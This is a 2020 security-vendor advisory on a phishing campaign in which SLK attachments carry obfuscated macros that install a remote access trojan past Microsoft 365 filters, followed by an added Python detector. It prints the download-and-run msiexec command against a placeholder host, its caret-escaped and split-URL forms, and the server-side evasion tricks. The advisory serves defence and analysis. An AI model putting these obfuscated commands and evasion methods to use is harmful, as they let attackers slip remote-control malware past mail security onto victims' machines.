200M+ Users At Risk: New Malicious .slk Files Are Bypassing Microsoft 365 Security


Avanan’s security analysts have detected new malicious .slk files bypassing Microsoft 365 security, risking 200M+ users. In this attack, hackers send an email with an .slk attachment that contains a malicious macro (MSI exec script) to download and install a remote access trojan. The attack specifically targets Microsoft 365 accounts and, until recently, was isolated to a small number of organizations. This has changed. Please find below the attack details.

SYLKin Attack: New Malicious .slk files are bypassing Microsoft 365 Security, Risking 200M+ Users

A new attack method bypasses both Microsoft 365 default security (EOP) and advanced security (ATP). At the time of writing, Microsoft 365 is still vulnerable and the attack is still being used extensively against Microsoft 365 customers.

This week, Avanan’s Security Analysts detected a significant increase in the usage of .slk files in attacks against Microsoft 365 customers. In this attack, hackers send an email with an .slk attachment that contains a malicious macro (MSI exec script) to download and install a remote access trojan.

It is a very sophisticated attack with several obfuscation methods specifically designed to bypass Microsoft 365. More details below.

Gmail customers are safe from this attack – Google blocks these files on incoming email and makes it impossible to send them as attachments from a Gmail account.

What should I do?

If you are an Avanan customer and in Protect (Inline) mode, this attack is blocked and users will not see these messages in their inbox. If you are in Monitor Mode, we recommend that you move to Protect (Inline) mode.

Alternatively, we recommend you configure your Office 365 account to reject files of this type. SLK files are relatively rare, so unless you have a legacy reason to allow them, we recommend excluding the SLK extension as a static mail-flow rule, at least until Microsoft fixes this gap. Microsoft’s recommendations are much more complicated, but are another alternative to protect the desktop.

About the Attack

SLK files are rare. If you have received one in your inbox, chances are you are being targeted by the most recent Remote Access Trojan malware that has been ‘upgraded’ to bypass Advanced Threat Protection. The attack method itself has been extensively documented, so I’ll only explain it briefly. The focus will be on how such a well-understood attack bypassed Office 365 filters, including ATP.

The attack specifically targets Microsoft 365 accounts and, until recently, was isolated to a small number of organizations. This has changed.

Emails are Targeted and Manually Created

The attack emails are highly customized, using information and language that could only have been found and written manually. The messages seem to come from a partner or customer, using a topic that is highly specific to the organization and the individual. For example, an email to a manufacturer will discuss parts specifications, an email to a tech firm will ask for changes to a large electronics order, while an email to a government department will discuss legal concerns. The subjects, contents, and even the attached files are customized with the target’s name and organization. No two are alike. What they have in common is that the messages are realistic and compelling enough to convince a user to click on the attached SLK file.

What is an SLK file?

A so-called “Symbolic Link” (SLK) file is Microsoft’s human-readable, text-based spreadsheet format that saw its last update when Dallas went off the air in 1986. At a time when XLS files were proprietary, SLK was an open-format alternative before XLSX was introduced in 2007. To the end-user, an SLK file looks like an Excel document. For the attacker, it is an easy way to bypass Microsoft 365 security, even for accounts protected with Advanced Threat Protection.

David Williams of V&C Inc.slk

What does this attack do?

This week’s version of the SYLK attack includes an SLK file with an obfuscated macro to run a command on a Windows machine:

msiexec /i http://malicious-site.com/install.php /q

This runs Windows Installer (msiexec) in quiet mode to install whatever MSI package they decide to host on their site. In this campaign, it is a hacked version of the off-the-shelf NetSupport remote control application, granting the attacker full control over the desktop.

Windows Grants More Trust to SLK Files than XLSX Files

Because Windows “Protected View” does not apply to SLK files downloaded from the Internet or from email, Excel does not open them in read-only mode.

When opening an SLK file, the end-user does not see this message:

Targeted Methodology to bypass Advanced Threat Protection

The first versions of the SLK attack method were seen in 2018 and were eventually blocked by Microsoft Advanced Threat Protection (ATP). This new campaign, however, includes a number of obfuscation techniques specifically designed to bypass ATP.

  • The attack was sent from hundreds of free Hotmail accounts.
  • The macro script includes ‘^’ characters to confuse ATP filters.
  • The URL was split in two so that ATP would not read it as a web link.
  • The hosting server became active after the email was sent so it seemed benign if sandboxed by ATP.
  • The hosting server only responded to “Windows Installer” user agents, ignoring other queries.

These methods are ATP-specific. Gmail blocks these files and, in fact, makes it impossible to send them from a Gmail account.

The attackers took advantage of a series of blind spots in the Microsoft email infrastructure.

The attack was sent from thousands of Hotmail accounts.

All of the emails were sent from disposable email addresses of the format “randomwords1982@hotmail.com”, each sending just a handful of messages at a time.

An important benefit of Hotmail to many attackers is that the same security filters are being used end to end. If the attacker is able to attach and send a file, it is likely that it will make it through the entire Microsoft security infrastructure. Should one of the accounts get flagged, Microsoft will disable it, informing the attacker that his messages are getting caught downstream.

While most of the well-known anonymous email sending engines deserve their poor spam and phishing reputations, Hotmail users benefit from Microsoft’s own reputation. Since the service was merged with its own Outlook application, Microsoft seems to grant them a higher level of trust than external senders.

The macro script includes escape characters to confuse ATP filters

The attackers take advantage of the fact that ATP filters do not interpret the text in the same way as the Windows command line. ATP would normally be able to identify the powerful and potentially malicious msiexec command but the attackers inserted command-line escape characters ‘^’ to obfuscate the script.

msiexec /i http://malicious-site.com/install.php /q

becomes

M^s^ie^xec /ih^tt^p^:^/^/malicious-site.com/install.php ^/q

When read by Advanced Threat Protection filters, the msiexec command becomes unreadable and the tell-tale ‘http://’ is obscured.

When read by the desktop command line, the escape characters ‘disappear’, running as if they were never there. This is just a command-line version of the Zero-Font methodologies that have plagued ATP for years.

The URL was split into two macros so that ATP would not read it as a link

ATP does not need to see the ‘http://’ to recognize a web link, and would normally catch any text of the format malicious-site.com. In order to hide the link, the attackers split it into two separate commands.

The first macro command creates a batch file with the first half of the URL.

set /p=""M^s^ie^xec /ih^tt^p^:^/^/malicious-sit"" > JBfoT.bat

The second macro command adds the remainder of the URL and then runs the batch file.

set /p=""e.com/install.php ^/q"" >> JBfoT.bat & JBfoT.bat

Within seconds, the malicious SLK file has run two simple commands to create a malicious install script and begin installing whatever software the attackers decide to host.
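
The following is an added example, not code from the original article or from Avanan: a static check that normalises the macro commands the way the desktop eventually would, so that both the ‘^’ escapes and the split URL described above stop hiding the msiexec call. It assumes the macro commands have already been extracted from the SLK file as strings; the function names are hypothetical, the sample input is constructed from the two commands quoted above, and the caret handling is a simplification of cmd.exe parsing.

```python
import re

# Constructed sample: the two macro commands quoted in the article, with the
# article's placeholder domain, as extracted from the file (assumption).
SAMPLE_COMMANDS = [
    'set /p=""M^s^ie^xec /ih^tt^p^:^/^/malicious-sit"" > JBfoT.bat',
    'set /p=""e.com/install.php ^/q"" >> JBfoT.bat & JBfoT.bat',
]

WRITE_RE = re.compile(
    r'set\s+/p\s*=\s*"+(?P<text>.*?)"+\s*(?P<op>>>?)\s*(?P<file>[^\s&|]+)', re.I)
MSI_RE = re.compile(
    r'\bmsiexec(?:\.exe)?\b[^\r\n]*?/i\s*(?P<url>https?://\S+)', re.I)


def naive_static_match(text):
    """What a literal keyword filter sees: no normalisation at all."""
    lowered = text.lower()
    return "msiexec" in lowered or "http://" in lowered or "https://" in lowered


def strip_carets(text):
    """Drop cmd.exe '^' escapes: '^x' -> 'x', '^^' -> '^'.

    Simplification: cmd.exe keeps carets inside double quotes on the first
    pass and removes them when the written batch file runs. For detection
    the end result is the same, so they are stripped everywhere.
    """
    return re.sub(r'\^(.)', r'\1', text)


def reassemble(commands):
    """Replay '>' (overwrite) and '>>' (append) writes into virtual files."""
    files, executed = {}, set()
    for raw in commands:
        cmd = strip_carets(raw)
        for m in WRITE_RE.finditer(cmd):
            name = m.group("file").lower()
            # 'set /p' prints its prompt without a newline, so parts join directly.
            prev = files.get(name, "") if m.group("op") == ">>" else ""
            files[name] = prev + m.group("text")
            # Is the file that was just written invoked later on the same line?
            rest = cmd[m.end():]
            if re.search(r'[&|]\s*' + re.escape(m.group("file")), rest, re.I):
                executed.add(name)
    return files, executed


def scan(commands):
    """Return one finding per reassembled file that installs a remote MSI."""
    files, executed = reassemble(commands)
    findings = []
    for name, content in files.items():
        m = MSI_RE.search(content)
        if m:
            findings.append({
                "file": name,
                "command": content,
                "url": m.group("url"),
                "quiet": bool(re.search(r'(?<!\S)/q', content, re.I)),
                "executed": name in executed,
            })
    return findings


if __name__ == "__main__":
    for raw in SAMPLE_COMMANDS:
        print("naive match on raw fragment:", naive_static_match(raw))
    for finding in scan(SAMPLE_COMMANDS):
        print(finding)
```

Neither raw fragment matches the literal keyword filter, while the reassembled batch file content does; the check only flags the remote install once both normalisation steps have been applied.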

The hosting server was armed after the message was sent

We don’t believe ATP is testing these files within their sandbox environment, relying on static filters, but we have found that other vendors have also failed to catch this attack, even when the code is executed in a virtual environment.

There is no special code or intelligence within the script to detect if it is running within emulation. Instead, the attackers do not enable the malicious web server until shortly after the email is sent. Because it cannot reach the server, the script fails, installing nothing.

In addition to enabling the URL only after delivery, the server would become inactive a few hours later, rejecting further queries. This seems to be a way to avoid action from their provider as “the reported content is no longer available at the links associated with” the attack by the time a manual take-down notice is requested.

The coordinated timing of the hosting servers with the sending of the emails suggests a more sophisticated campaign. When combined with the high-profile nature of the targeted organizations, this suggests an APT group or state actor.

The hosting server only responded to requests from “Windows Installer” agents

In addition to their on-then-off-again timing, the hosting servers utilized another common technique to avoid analysis, rejecting all queries except for those with User-Agent: Windows Installer. This ensured that it only responded to the malicious script and would avoid detection by URL analysis tools.

Why Wasn’t it Caught?

Each of the obfuscation methodologies was designed to bypass a specific layer of the Microsoft 365 security infrastructure. While we understand how each was used in turn, we are still confused as to how ATP fails to detect this technique in emulation. Creating a batch file and calling the msiexec application is considered malicious, even if it fails to run. We must assume, then, that none of these files are being tested by the sandbox layer. Unfortunately, because each file is unique, no two attachments have the same MD5 hash, requiring each file to be given additional scrutiny.



2020-06-26 07:00:00
